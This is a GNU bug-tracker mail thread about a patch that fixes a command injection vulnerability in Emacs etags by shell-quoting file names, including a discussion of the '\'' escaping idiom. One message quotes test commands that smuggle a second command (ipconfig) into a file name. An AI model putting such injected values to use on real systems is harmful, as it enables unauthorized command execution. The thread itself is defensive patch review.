Content-Type: text/plain X-Spam-Score: -2.3 (--) X-Debbugs-Envelope-To: 59817 Cc: Eli Zaretskii , Stefan Kangas , 59817@debbugs.gnu.org X-BeenThere: debbugs-submit@debbugs.gnu.org X-Mailman-Version: 2.1.18 Precedence: list List-Id: List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , Errors-To: debbugs-submit-bounces@debbugs.gnu.org Sender: "Debbugs-submit" X-Spam-Score: -3.3 (---) There is a shell_quote funtion in gnulib. -- Andreas Schwab, SUSE Labs, schwab@suse.de GPG Key fingerprint = 0196 BAD8 1CE9 1970 F4BE 1748 E4D4 88E3 0EEA B9D7 "And now for something completely different." From debbugs-submit-bounces@debbugs.gnu.org Tue Dec 06 08:11:52 2022 Received: (at 59817) by debbugs.gnu.org; 6 Dec 2022 13:11:52 +0000 Received: from localhost ([127.0.0.1]:42929 helo=debbugs.gnu.org) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1p2Xjk-0001Pf-Co for submit@debbugs.gnu.org; Tue, 06 Dec 2022 08:11:52 -0500 Received: from out203-205-221-235.mail.qq.com ([203.205.221.235]:50961) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1p2Xjg-0001PZ-CV for 59817@debbugs.gnu.org; Tue, 06 Dec 2022 08:11:50 -0500 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=qq.com; s=s201512; t=1670332298; bh=IoGQdl3aZIepG2ZYPGs3uFGEaBRZl1PjZsTktcJm7l8=; h=Date:From:To:Cc:Subject:In-Reply-To:References; b=dnWfSibq6+Bn4JfM+FJwp7mujSxEayuAEY7bJd9b1LTmxvt/sGNs9/7Mv5qef36L4 4aciB5KGZiww9himG3aQdRY4hN0k3C8uSuHeFcgEwP+g4YFmQhdIjpCDUSmKzGFq3P r21ldoLezjJ1yuGEyQzcJ9my5hiKNGAgL4UpSU4M= Received: from lx-pc ([240e:399:e6f:ee32:f815:4044:ba50:97f9]) by newxmesmtplogicsvrszc2-0.qq.com (NewEsmtp) with SMTP id 2E530E9C; Tue, 06 Dec 2022 21:11:37 +0800 X-QQ-mid: xmsmtpt1670332297tc5zruu3z Message-ID: X-QQ-XMAILINFO: OEgU9iHXvJ5F82U4wQGOJKWpH+eW05UUQCMWiu0AXlnJvchdG1MF1dxNILiZW+ jLZ8isSmvWvtKRVTF9mFnIxqCVS0jZ1JBSDAZ3V0FtHQiyzIlifU9tvXoX9lHiq+qPwSukeY+Ape 7IFVbhByyUfcsLoyozfrnOaIY42ivoWlYYp01j+Fa/acCsNXv6ewelnwm4t5iV9cWiMchQX5eFcZ vIekaez82SvMjDeAM3aj10NcTX82XSNBNgY+ncUzu3rxY2SJ6YmNJtsvjxrR6yLp3N5lxXEDtvko ++61X93FB5yyC2FfGt33ivQUNcLB82SDmSw6NgHucONStTeY9gapxCjJ75V9jQp8dUlcFaTZwtY/ 7SmdETWkhjuZX49RDenWZIym1kRUO5Z9iSOiuAuMmpU5aK3IeJ1tKCScacZis7Qg0rPIie+8iMQO A6+UDBCWp72o2K7ZS4w3wp4xKqMXMml4fHdU5TuQYmbbbeKYcW+4iMC9jq1oH5vOdj3prxBS2xPx oGV0VCNJsrDwPyZm0GbmoqmSQj4So6NBfSioIifat4KXHI3k3PVTG1aV6gm59Yr+Z5sBWUsS3DST YeuBFhvnG+86ceTGdiv/tmJOZcSljyUaQ7Lq0USuCrq9rwxmZG/p0v0npc7iTOgO/fiJHzJHu4HP wBcPkHRrjG8gsa+jEcDTaN3rjUSGOLXXwk1n6cBsDq2Q8Tjdv6ueKDilyoF9bXOSM7BkGCleO75+ 3QBdoxTXns/w0PoDK+JL8SwVpccrwamxrRTM/JCxaLjsk2xF8XKgZoIjfQjf/u/9yRa4obf/3lJX fVzgqh9tShIl2G+nhwi3pImfm0EOMKC8Zi7E2JPEN8uiLXNNsBBVYAzYnB+yuyZMGi/f3ZQLWUMa RxlNipmZBhCaAnmD+nRJ9ESAVxjlHQOxJaFVUguqdirA4YZ594Pkg3N65HRosxZZljgcBHbHjRPc 2ecr0tvswaxiPahTkfh03SR9WTyUQz5EqHi3pOWTsMADz8KPNdzX//3YAej2WBHB45Q0Cb9JI= Date: Tue, 6 Dec 2022 21:11:35 +0800 From: lux To: Eli Zaretskii Subject: Re: bug#59817: [PATCH] Fix etags local command injection vulnerability X-OQ-MSGID: <20221206211135.0c5304a9@lx-pc> In-Reply-To: <83lenk7kuq.fsf@gnu.org> References: <83r0xf9qsx.fsf@gnu.org> <834jua9ggd.fsf@gnu.org> <83lenk7kuq.fsf@gnu.org> X-Mailer: Claws Mail 4.1.1 (GTK 3.24.35; x86_64-redhat-linux-gnu) MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="MP_/IyOO.Vb0zttQLsQMmeo=aLR" X-Spam-Score: 3.6 (+++) X-Spam-Report: Spam detection software, running on the system "debbugs.gnu.org", has NOT identified this incoming email as spam. The original message has been attached to this so you can view it or label similar future email. If you have any questions, see the administrator of that system for details. Content preview: On Tue, 06 Dec 2022 14:55:09 +0200 Eli Zaretskii wrote: > The "MSDOS || DOS_NT" case also needs a small change: > > > char *cmd = concat (cmd1, "\" > ", tmp_name); > > This doesn't quote tmp_name; it should. Content analysis details: (3.6 points, 10.0 required) pts rule name description ---- ---------------------- -------------------------------------------------- -0.0 RCVD_IN_DNSWL_NONE RBL: Sender listed at https://www.dnswl.org/, no trust [203.205.221.235 listed in list.dnswl.org] 0.0 SPF_HELO_NONE SPF: HELO does not publish an SPF Record 0.0 SPF_NONE SPF: sender does not publish an SPF Record 0.4 RDNS_DYNAMIC Delivered to internal network by host with dynamic-looking rDNS 3.2 HELO_DYNAMIC_IPADDR Relay HELO'd using suspicious hostname (IP addr 1) X-Debbugs-Envelope-To: 59817 Cc: stefankangas@gmail.com, 59817@debbugs.gnu.org X-BeenThere: debbugs-submit@debbugs.gnu.org X-Mailman-Version: 2.1.18 Precedence: list List-Id: List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , Errors-To: debbugs-submit-bounces@debbugs.gnu.org Sender: "Debbugs-submit" X-Spam-Score: 2.6 (++) X-Spam-Report: Spam detection software, running on the system "debbugs.gnu.org", has NOT identified this incoming email as spam. The original message has been attached to this so you can view it or label similar future email. If you have any questions, see the administrator of that system for details. Content preview: On Tue, 06 Dec 2022 14:55:09 +0200 Eli Zaretskii wrote: > The "MSDOS || DOS_NT" case also needs a small change: > > > char *cmd = concat (cmd1, "\" > ", tmp_name); > > This doesn't quote tmp_name; it should. Content analysis details: (2.6 points, 10.0 required) pts rule name description ---- ---------------------- -------------------------------------------------- -0.0 RCVD_IN_DNSWL_NONE RBL: Sender listed at https://www.dnswl.org/, no trust [203.205.221.235 listed in list.dnswl.org] 0.0 SPF_HELO_NONE SPF: HELO does not publish an SPF Record 0.0 SPF_NONE SPF: sender does not publish an SPF Record 0.4 RDNS_DYNAMIC Delivered to internal network by host with dynamic-looking rDNS -1.0 MAILING_LIST_MULTI Multiple indicators imply a widely-seen list manager 3.2 HELO_DYNAMIC_IPADDR Relay HELO'd using suspicious hostname (IP addr 1) --MP_/IyOO.Vb0zttQLsQMmeo=aLR Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Disposition: inline On Tue, 06 Dec 2022 14:55:09 +0200 Eli Zaretskii wrote: > The "MSDOS || DOS_NT" case also needs a small change: > > > char *cmd = concat (cmd1, "\" > ", tmp_name); > > This doesn't quote tmp_name; it should. Because double quotes have been used here, I have not reproduced this vulnerability in Windows, so I have not dealt: $ touch "etags.c\" && ipconfig \".z" $ ./etags.exe "etags.c\" && ipconfig \".z" etags.c" && ipconfig ".z: Invalid argument $ ./etags.exe * etags.exe: skipping inclusion of TAGS in self. etags.c" && ipconfig ".z: Invalid argument > > +static char* > ^^ > There should be a space before "*". done. > > > + if (*p == '\'') > > + { > > + new_str[i+1] = '\\'; > > + new_str[i+2] = '\''; > > + new_str[i+3] = '\''; > > + i += 3; > > I don't understand why you are adding ''\'' and not just \'. > Wouldn't the latter work for some reason? > Because the single quote escape is: '\'' $ echo ''\''hello world'\''' 'hello world' $ echo 'I'\''m a poor man' I'm a poor man --MP_/IyOO.Vb0zttQLsQMmeo=aLR Content-Type: text/x-patch Content-Transfer-Encoding: 7bit Content-Disposition: attachment; filename=0001-Fix-etags-local-command-injection-vulnerability.patch >From e182ffe325c882696e20d6e7f8fcbefe82198748 Mon Sep 17 00:00:00 2001 From: lu4nx Date: Tue, 6 Dec 2022 15:42:40 +0800 Subject: [PATCH] Fix etags local command injection vulnerability * lib-src/etags.c: (escape_shell_arg_string): New function. --- lib-src/etags.c | 58 +++++++++++++++++++++++++++++++++++++++++++++++-- 1 file changed, 56 insertions(+), 2 deletions(-) diff --git a/lib-src/etags.c b/lib-src/etags.c index d1d20858cd..519829ec79 100644 --- a/lib-src/etags.c +++ b/lib-src/etags.c @@ -401,6 +401,7 @@ #define xrnew(op, n, m) ((op) = xnrealloc (op, n, (m) * sizeof *(op))) static void put_entries (node *); static void cleanup_tags_file (char const * const, char const * const); +static char *escape_shell_arg_string (char *); static void do_move_file (const char *, const char *); static char *concat (const char *, const char *, const char *); static char *skip_spaces (char *); @@ -1716,8 +1717,12 @@ process_file_name (char *file, language *lang) char *cmd1 = concat (compr->command, " \"", real_name); char *cmd = concat (cmd1, "\" > ", tmp_name); #else - char *cmd1 = concat (compr->command, " '", real_name); - char *cmd = concat (cmd1, "' > ", tmp_name); + char *new_real_name = escape_shell_arg_string (real_name); + char *new_tmp_name = escape_shell_arg_string (tmp_name); + char *cmd1 = concat (compr->command, " ", new_real_name); + char *cmd = concat (cmd1, " > ", new_tmp_name); + free (new_real_name); + free (new_tmp_name); #endif free (cmd1); inf = (system (cmd) == -1 @@ -7707,6 +7712,55 @@ etags_mktmp (void) return templt; } +/* + * Adds single quotes around a string, if found single quotes, escaped it. + * Return a newly-allocated string. + * + * For example: + * escape_shell_arg_string("test.txt") => 'test.txt' + * escape_shell_arg_string("'test.txt") => ''\''test.txt' + */ +static char * +escape_shell_arg_string (char *str) +{ + char *p = str; + int need_space = 2; /* ' at begin and end */ + + while (*p != '\0') + { + if (*p == '\'') + need_space += 4; /* ' to '\'', length is 4 */ + else + need_space++; + + p++; + } + + char *new_str = xnew (need_space + 1, char); + new_str[0] = '\''; + new_str[need_space-1] = '\''; + + int i = 1; /* skip first byte */ + p = str; + while (*p != '\0') + { + new_str[i] = *p; + if (*p == '\'') + { + new_str[i+1] = '\\'; + new_str[i+2] = '\''; + new_str[i+3] = '\''; + i += 3; + } + + i++; + p++; + } + + new_str[need_space] = '\0'; + return new_str; +} + static void do_move_file(const char *src_file, const char *dst_file) { -- 2.38.1 --MP_/IyOO.Vb0zttQLsQMmeo=aLR-- From debbugs-submit-bounces@debbugs.gnu.org Tue Dec 06 09:33:50 2022 Received: (at 59817) by debbugs.gnu.org; 6 Dec 2022 14:33:50 +0000 Received: from localhost ([127.0.0.1]:43289 helo=debbugs.gnu.org) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1p2Z11-0004SN-1I for submit@debbugs.gnu.org; Tue, 06 Dec 2022 09:33:50 -0500 Received: from eggs.gnu.org ([209.51.188.92]:56408) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1p2Z0v-0004SF-O3 for 59817@debbugs.gnu.org; Tue, 06 Dec 2022 09:33:45 -0500 Received: from fencepost.gnu.org ([2001:470:142:3::e]) by eggs.gnu.org with esmtps (TLS1.2:ECDHE_RSA_AES_256_GCM_SHA384:256) (Exim 4.90_1) (envelope-from ) id 1p2Z0o-00089H-Ck; Tue, 06 Dec 2022 09:33:34 -0500 DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=gnu.org; s=fencepost-gnu-org; h=References:Subject:In-Reply-To:To:From:Date: mime-version; bh=+iDdfbycAYjNrBtjpFWxmPB+ViQyHumeHW0ZgBCP4jU=; b=I8ZRfsMJMeh2 H60GCh+7klSYHfLmqoRQWo7q9X6vUjh3dZ22wDZLtZiy2hV19+vrIT2MTq2JQ6NRRM43g9RBdohF7 yr7bGZGQG/SLkqA+6B9pAeInf3w42hyPhPU0On9U7y66rHHsh6eSPspeMV0ZV7j5PNdmmyc+cA0w+ ClUvJijODvJiqVOhAjq1UEYcQdVrnElvW+OoiY+b5ypDyuoJxKZm4g3nnpHSepwqaqdfhwtIbNggP sHkG+PwScl3aeG71zcdiT+rRM7AufPY0r8MZl44jol7o6nqwJcxUU9bChSk1msmUbYaEGfXMgYH28 EwEMUbL/R/iU3RPswRZzmQ==; Received: from [87.69.77.57] (helo=home-c4e4a596f7) by fencepost.gnu.org with esmtpsa (TLS1.2:ECDHE_RSA_AES_256_GCM_SHA384:256) (Exim 4.90_1) (envelope-from ) id 1p2Z0n-0001za-QD; Tue, 06 Dec 2022 09:33:34 -0500 Date: Tue, 06 Dec 2022 16:33:19 +0200 Message-Id: <83edtc7gb4.fsf@gnu.org> From: Eli Zaretskii To: Andreas Schwab In-Reply-To: (message from Andreas Schwab on Tue, 06 Dec 2022 14:05:16 +0100) Subject: Re: bug#59817: [PATCH] Fix etags local command injection vulnerability References: <83r0xf9qsx.fsf@gnu.org> <834jua9ggd.fsf@gnu.org> X-Spam-Score: -2.3 (--) X-Debbugs-Envelope-To: 59817 Cc: lx@shellcodes.org, stefankangas@gmail.com, 59817@debbugs.gnu.org X-BeenThere: debbugs-submit@debbugs.gnu.org X-Mailman-Version: 2.1.18 Precedence: list List-Id: List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , Errors-To: debbugs-submit-bounces@debbugs.gnu.org Sender: "Debbugs-submit" X-Spam-Score: -3.3 (---) > From: Andreas Schwab > Cc: Eli Zaretskii , Stefan Kangas , > 59817@debbugs.gnu.org > Date: Tue, 06 Dec 2022 14:05:16 +0100 > > There is a shell_quote funtion in gnulib. I know. But we don't import that module, AFAICT. From debbugs-submit-bounces@debbugs.gnu.org Tue Dec 06 09:53:04 2022 Received: (at 59817) by debbugs.gnu.org; 6 Dec 2022 14:53:04 +0000 Received: from localhost ([127.0.0.1]:43380 helo=debbugs.gnu.org) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1p2ZJg-0004eb-8b for submit@debbugs.gnu.org; Tue, 06 Dec 2022 09:53:04 -0500 Received: from eggs.gnu.org ([209.51.188.92]:41480) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1p2ZJd-0004eE-Sg for 59817@debbugs.gnu.org; Tue, 06 Dec 2022 09:53:03 -0500 Received: from fencepost.gnu.org ([2001:470:142:3::e]) by eggs.gnu.org with esmtps (TLS1.2:ECDHE_RSA_AES_256_GCM_SHA384:256) (Exim 4.90_1) (envelope-from ) id 1p2ZJX-0003au-Uu; Tue, 06 Dec 2022 09:52:55 -0500 DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=gnu.org; s=fencepost-gnu-org; h=References:Subject:In-Reply-To:To:From:Date: mime-version; bh=rFLlVaf65ps/ksHkAlRhZ56IQfR6PWpOtcjgHprmAD0=; b=K5HwiLZFwvSl mBlDsB48LGIVPRugsr3mPRpJWTA+B8EcgylhaffnNtDBM3/RRwJOGpFPWQQGiee5zDHmWx8dMr691 8NRVZycGJjwEd7fUZzbcNyfQ/dodCJI0Bq7BB9SoeRil7nufQq7GohjZ3jonu8CiIltS0LOSx6yUj aqIk9QfWPwYw+TNmVOwe2/xMqtbYS/MI99DJ0D5gHVznEe4mRHEXiehvObrr26TNEffyz8rFKkbiv TMwkv79wwyCEKEMHdV7uC/2RsTK1W729ltGvR2RZ0p6vO5rDbb4kNyHrmYiJJIBN7fShCTHlJO0NQ QCjdpmcHpHVdcKz2VEoJcw==; Received: from [87.69.77.57] (helo=home-c4e4a596f7) by fencepost.gnu.org with esmtpsa (TLS1.2:ECDHE_RSA_AES_256_GCM_SHA384:256) (Exim 4.90_1) (envelope-from ) id 1p2ZJX-00040G-4K; Tue, 06 Dec 2022 09:52:55 -0500 Date: Tue, 06 Dec 2022 16:52:40 +0200 Message-Id: <83bkog7fev.fsf@gnu.org> From: Eli Zaretskii To: lux In-Reply-To: (message from lux on Tue, 6 Dec 2022 21:11:35 +0800) Subject: Re: bug#59817: [PATCH] Fix etags local command injection vulnerability References: <83r0xf9qsx.fsf@gnu.org> <834jua9ggd.fsf@gnu.org> <83lenk7kuq.fsf@gnu.org> X-Spam-Score: -2.3 (--) X-Debbugs-Envelope-To: 59817 Cc: stefankangas@gmail.com, 59817@debbugs.gnu.org X-BeenThere: debbugs-submit@debbugs.gnu.org X-Mailman-Version: 2.1.18 Precedence: list List-Id: List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , Errors-To: debbugs-submit-bounces@debbugs.gnu.org Sender: "Debbugs-submit" X-Spam-Score: -3.3 (---) > Date: Tue, 6 Dec 2022 21:11:35 +0800 > From: lux > Cc: stefankangas@gmail.com, 59817@debbugs.gnu.org > > On Tue, 06 Dec 2022 14:55:09 +0200 > Eli Zaretskii wrote: > > > The "MSDOS || DOS_NT" case also needs a small change: > > > > > char *cmd = concat (cmd1, "\" > ", tmp_name); > > > > This doesn't quote tmp_name; it should. > > Because double quotes have been used here The double quotes are only around real_name, but not around tmp_name. One of the issues you originally described was a bogus value of the TEMP environment variable, which gets used in etags_mktmp that produces tmp_name. > I have not reproduced this > vulnerability in Windows, so I have not dealt: > > $ touch "etags.c\" && ipconfig \".z" > $ ./etags.exe "etags.c\" && ipconfig \".z" > etags.c" && ipconfig ".z: Invalid argument Windows file names cannot include quote characters, so don't use them. And it's TEMP value that you need to tweak, not the file names etags scans. > > I don't understand why you are adding ''\'' and not just \'. > > Wouldn't the latter work for some reason? > > > > Because the single quote escape is: '\'' > > $ echo ''\''hello world'\''' > 'hello world' > $ echo 'I'\''m a poor man' > I'm a poor man I don't understand why you need an extra pair of quotes in the expanded string. $ echo \''hello; world' 'hello; world As you see, the semi-colon was successfully hidden from the shell. What am I missing? From debbugs-submit-bounces@debbugs.gnu.org Tue Dec 06 10:06:04 2022 Received: (at 59817) by debbugs.gnu.org; 6 Dec 2022 15:06:04 +0000 Received: from localhost ([127.0.0.1]:43449 helo=debbugs.gnu.org) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1p2ZWG-0004mV-Lt for submit@debbugs.gnu.org; Tue, 06 Dec 2022 10:06:04 -0500 Received: from relay3.ehiweb.it ([79.98.45.20]:39149 helo=plesklin7.if1.ehiweb.it) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1p2ZWD-0004m8-Rb for 59817@debbugs.gnu.org; Tue, 06 Dec 2022 10:06:02 -0500 Received: from tucano.isti.cnr.it (tucano.isti.cnr.it [146.48.81.102]) by plesklin7.if1.ehiweb.it (Postfix) with ESMTPSA id D135810842A; Tue, 6 Dec 2022 16:05:59 +0100 (CET) Message-Id: <87r0xctvvs.fsf@tucano.isti.cnr.it> From: =?utf-8?Q?Francesco_Potort=C3=AC?= Date: Tue, 06 Dec 2022 16:05:59 +0100 To: Eli Zaretskii In-Reply-To: <83bkog7fev.fsf@gnu.org> (eliz@gnu.org) Subject: Re: bug#59817: [PATCH] Fix etags local command injection vulnerability References: <83r0xf9qsx.fsf@gnu.org> <834jua9ggd.fsf@gnu.org> <83lenk7kuq.fsf@gnu.org> <83bkog7fev.fsf@gnu.org> Organization: The GNU project X-fingerprint: 4B02 6187 5C03 D6B1 2E31 7666 09DF 2DC9 BE21 6115 X-PPP-Message-ID: <20221206150559.25596.15791@plesklin7.if1.ehiweb.it> X-PPP-Vhost: potorti.it X-Spam-Score: 1.0 (+) X-Debbugs-Envelope-To: 59817 Cc: lux , 59817@debbugs.gnu.org, stefankangas@gmail.com X-BeenThere: debbugs-submit@debbugs.gnu.org X-Mailman-Version: 2.1.18 Precedence: list List-Id: List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , Errors-To: debbugs-submit-bounces@debbugs.gnu.org Sender: "Debbugs-submit" X-Spam-Score: -0.0 (/) >I don't understand why you need an extra pair of quotes in the expanded >string. > > $ echo \''hello; world' > 'hello; world > >As you see, the semi-colon was successfully hidden from the shell. > >What am I missing? That only works at the beginning or end of a string. In general, inside a single-quoted string, single quotes are not allowed. So, to include a single quote inside a single-quoted string, you have to: - close the quoted string using ' - put a literal single quote usign \' - reopen the quoted string using ' If you want to avoid checking for the special cases of a stray single string at beginning or end of the original string, you just quote everything qith a single quote at beginning and end, and then substitute each ' with '\''. From debbugs-submit-bounces@debbugs.gnu.org Tue Dec 06 10:19:38 2022 Received: (at 59817) by debbugs.gnu.org; 6 Dec 2022 15:19:38 +0000 Received: from localhost ([127.0.0.1]:43514 helo=debbugs.gnu.org) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1p2ZjO-0004t7-5l for submit@debbugs.gnu.org; Tue, 06 Dec 2022 10:19:38 -0500 Received: from relay3.ehiweb.it ([79.98.45.20]:40612 helo=plesklin7.if1.ehiweb.it) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1p2ZjL-0004t1-Id for 59817@debbugs.gnu.org; Tue, 06 Dec 2022 10:19:36 -0500 Received: from tucano.isti.cnr.it (tucano.isti.cnr.it [146.48.81.102]) by plesklin7.if1.ehiweb.it (Postfix) with ESMTPSA id BF7DA1078F9; Tue, 6 Dec 2022 16:19:32 +0100 (CET) Message-Id: <87pmcwtv97.fsf@tucano.isti.cnr.it> From: =?utf-8?Q?Francesco_Potort=C3=AC?= Date: Tue, 06 Dec 2022 16:19:32 +0100 To: Eli Zaretskii In-Reply-To: <83bkog7fev.fsf@gnu.org> (eliz@gnu.org) Subject: Re: bug#59817: [PATCH] Fix etags local command injection vulnerability References: <83r0xf9qsx.fsf@gnu.org> <834jua9ggd.fsf@gnu.org> <83lenk7kuq.fsf@gnu.org> <83bkog7fev.fsf@gnu.org> Organization: The GNU project X-fingerprint: 4B02 6187 5C03 D6B1 2E31 7666 09DF 2DC9 BE21 6115 X-PPP-Message-ID: <20221206151932.32294.7898@plesklin7.if1.ehiweb.it> X-PPP-Vhost: potorti.it X-Spam-Score: 1.0 (+) X-Debbugs-Envelope-To: 59817 Cc: lux , 59817@debbugs.gnu.org, stefankangas@gmail.com X-BeenThere: debbugs-submit@debbugs.gnu.org X-Mailman-Version: 2.1.18 Precedence: list List-Id: List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , Errors-To: debbugs-submit-bounces@debbugs.gnu.org Sender: "Debbugs-submit" X-Spam-Score: -0.0 (/) >I don't understand why you need an extra pair of quotes in the expanded >string. > > $ echo \''hello; world' > 'hello; world > >As you see, the semi-colon was successfully hidden from the shell. > >What am I missing? That only works at the beginning or end of a string. In general, inside a single-quoted string, single quotes are not allowed. So, to include a single quote inside a single-quoted string, you have to: - close the quoted string using ' - put a literal single quote usign \' - reopen the quoted string using ' If you want to avoid checking for the special cases of a stray single string at beginning or end of the original string, you just quote everything qith a single quote at beginning and end, and then substitute each ' with '\''. From debbugs-submit-bounces@debbugs.gnu.org Tue Dec 06 10:49:23 2022 Received: (at 59817) by debbugs.gnu.org; 6 Dec 2022 15:49:23 +0000 Received: from localhost ([127.0.0.1]:43649 helo=debbugs.gnu.org) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1p2aCA-00059M-Ku for submit@debbugs.gnu.org; Tue, 06 Dec 2022 10:49:23 -0500 Received: from out162-62-57-64.mail.qq.com ([162.62.57.64]:40569) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1p2aC7-00059D-GK for 59817@debbugs.gnu.org; Tue, 06 Dec 2022 10:49:21 -0500 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=qq.com; s=s201512; t=1670341749; bh=6BPWo4r96eKYEYLmzrNvlX/8j7OneJ3R5LEvCk577Kc=; h=Date:From:To:Cc:Subject:In-Reply-To:References; b=NScGY5rnoFXDxlYUMbJ0oQ0LMmeFNlstDeZojn/ovGd1q8Ivn3mkaBjd6k2oO0Fg2 qpB5I67Uu1+k4YwERlvfUrxfZ+LsQYcjLh3z7eBvyWCaNEWZKXNGGZgG7+LHaaHWPu MZBo4g775h+vIS9QjtSFMWKc8mF+vvgSuK5LIiGs= Received: from lx-pc ([240e:399:e6f:ee32:f815:4044:ba50:97f9]) by newxmesmtplogicsvrsza2-0.qq.com (NewEsmtp) with SMTP id C47B1E9E; Tue, 06 Dec 2022 23:49:07 +0800 X-QQ-mid: xmsmtpt1670341747tj21nidh2 Message-ID: X-QQ-XMAILINFO: MRMtjO3A6C9XmAjgw7xn+mQNwoFgd/sKaXiZ6Fb/kMD60lXWVZS/cdhcbdJlxA YdetDNQ4Skuls0bQNZU6rA19xTpsqI8y33WvoEX8Cf0fq66T+pxhbpEGIDKmQJgq1vDfWU9yZqU1 M49LEE7o4VE1SxSUscoy8w6jbQwS0aLLtdlWkSnkcgZEIhNqtz0b2pa9D6YQJkuGoJv3O0WAXNPB uay9RiQW8xPW/v/SNkp5QC3/XDUKI0dybbfL1vgivx5cunjCfUMpFQZjp52L+UNPSEaB9wBwuPdJ 05Lsz/sNnVyyKeL3uEUrX0N6LwU03n2okege2LXNt/kUvlBibUMNoJjX7Kb9NEL3RyhMbcqPp1Qd tP8gHoDAoxOF4DxUXU5YdXBSwrX+OsqfFmkVqW/BRhqA4ZMRVMZeXxu2KjDh+CBktoXguzl4acWU H8ZEMoIx1+ixq6rf4yROZAeNnI2oTMjM5l+q1oF5dd2xcPH+BJZbBixq/yh3s5/6lcfi1K6heUMf +8Y2QUHBhdI1wVkf7xSldox0ftsCOBZEBeIZ6ahnDxHZQzZigaGq89u3G+vu3QjxV/MBYXF9U1qX EJKvZA50eFwurzvcyczGXts4s7lCgJgzETPtD0JFe9u0pkoJDUb4uiYD+WafWjXICPCr6Sgve/sV 80CDbB4/sCNHWg7V9myET1oPm+LpCqjYYDHqn3rtgwxShZyoV7c+oNK6cmibOKX9I9SBs6EyK6eq 5ozd7K72QKwP5NvOe1qh0gTp+FitJ4+boAy0fgfVkC19O+T+sLpew+T6InCMCHqRO4Vw5TyOKS1t WFMT4A2FcYCsboPgyuSlCxDWWOHMziifEiATzcdMCr3BM9kbVR+RdqVLhgEB+d/OizYMPeVNAEs8 CLVfVCrDkRSBKiSaCCpoqdI5eklnW/oQ0D58fTJ/5dgPENOjdA1v5fSoE5bb3sYH1vyeousr1H2w E3aZfvz3V7yzNJJngLmi8Y1cCXVQlVZwUVQJvPLHCzUFXw61AeiVnm7H2iRcWkPryz4BOLuxMlHZ iOeV2dUQTBDkbYg+qXx/kGHuF7IqxTltSpiS5UalK/NBEkR/vA Date: Tue, 6 Dec 2022 23:49:05 +0800 From: lux To: Eli Zaretskii Subject: Re: bug#59817: [PATCH] Fix etags local command injection vulnerability X-OQ-MSGID: <20221206234905.58c5f727@lx-pc> In-Reply-To: <83bkog7fev.fsf@gnu.org> References: <83r0xf9qsx.fsf@gnu.org> <834jua9ggd.fsf@gnu.org> <83lenk7kuq.fsf@gnu.org> <83bkog7fev.fsf@gnu.org> X-Mailer: Claws Mail 4.1.1 (GTK 3.24.35; x86_64-redhat-linux-gnu) MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="MP_/c0DjgTV.HH5la7Q4FClfKbi" X-Spam-Score: 3.6 (+++) X-Spam-Report: Spam detection software, running on the system "debbugs.gnu.org", has NOT identified this incoming email as spam. The original message has been attached to this so you can view it or label similar future email. If you have any questions, see the administrator of that system for details. Content preview: On Tue, 06 Dec 2022 16:52:40 +0200 Eli Zaretskii wrote: > Windows file names cannot include quote characters, so don't use > them. And it's TEMP value that you need to tweak, not the file names > etags scans. Content analysis details: (3.6 points, 10.0 required) pts rule name description ---- ---------------------- -------------------------------------------------- -0.0 RCVD_IN_DNSWL_NONE RBL: Sender listed at https://www.dnswl.org/, no trust [162.62.57.64 listed in list.dnswl.org] -0.0 RCVD_IN_MSPIKE_H2 RBL: Average reputation (+2) [162.62.57.64 listed in wl.mailspike.net] 0.0 SPF_HELO_NONE SPF: HELO does not publish an SPF Record 0.0 SPF_NONE SPF: sender does not publish an SPF Record 0.4 RDNS_DYNAMIC Delivered to internal network by host with dynamic-looking rDNS 3.2 HELO_DYNAMIC_IPADDR Relay HELO'd using suspicious hostname (IP addr 1) X-Debbugs-Envelope-To: 59817 Cc: stefankangas@gmail.com, 59817@debbugs.gnu.org X-BeenThere: debbugs-submit@debbugs.gnu.org X-Mailman-Version: 2.1.18 Precedence: list List-Id: List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , Errors-To: debbugs-submit-bounces@debbugs.gnu.org Sender: "Debbugs-submit" X-Spam-Score: 2.6 (++) X-Spam-Report: Spam detection software, running on the system "debbugs.gnu.org", has NOT identified this incoming email as spam. The original message has been attached to this so you can view it or label similar future email. If you have any questions, see the administrator of that system for details. Content preview: On Tue, 06 Dec 2022 16:52:40 +0200 Eli Zaretskii wrote: > Windows file names cannot include quote characters, so don't use > them. And it's TEMP value that you need to tweak, not the file names > etags scans. Content analysis details: (2.6 points, 10.0 required) pts rule name description ---- ---------------------- -------------------------------------------------- -0.0 RCVD_IN_DNSWL_NONE RBL: Sender listed at https://www.dnswl.org/, no trust [162.62.57.64 listed in list.dnswl.org] -0.0 RCVD_IN_MSPIKE_H2 RBL: Average reputation (+2) [162.62.57.64 listed in wl.mailspike.net] 0.0 SPF_HELO_NONE SPF: HELO does not publish an SPF Record 0.0 SPF_NONE SPF: sender does not publish an SPF Record 0.4 RDNS_DYNAMIC Delivered to internal network by host with 